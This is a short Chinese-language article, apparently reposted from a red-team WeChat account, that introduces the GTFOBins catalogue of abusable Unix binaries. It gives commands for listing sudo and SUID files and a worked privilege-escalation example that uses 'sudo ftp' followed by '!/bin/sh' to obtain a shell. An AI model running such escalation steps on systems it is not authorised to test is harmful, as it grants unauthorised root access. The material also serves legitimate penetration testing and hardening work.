0-简介
GTFOBins 是精选的 Unix 二进制文件列表,可用于绕过系统中错误配置,突破本地安全限制,进行权限提升
覆盖390多个可提权文件
该项目收集了可以被滥用的 Unix 二进制文件的合法函数,用于突破受限的 shell、提升或维持提升的权限、传输文件、生成绑定和反向 shell,以及促进其他后期利用任务
1-名称
GTFOBins
2-来源
https://gtfobins.github.io/
3-用法
在linux的shell下查看sudo 及 suid 文件使用如下命令:
sudo -l
find / -perm -u=s -type f 2>/dev/null
将得到的文件列表,在https://gtfobins.github.io/中查找,查到结果可以使用相关提权命令进行提权
4-技巧
查找sudo或suid文件:
sudo -l
find / -perm -u=s -type f 2>/dev/null
查找提权方式:
比如发现sudo文件ftp
https://gtfobins.github.io/#ftp
点击ftp后面的sudo标签
https://gtfobins.github.io/gtfobins/ftp/#sudo
提权命令如下:
sudo ftp
!/bin/sh
执行后提权成功
原文始发于微信公众号(高级红队专家):黑客武器库 | Linux提权神器GTFOBins
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论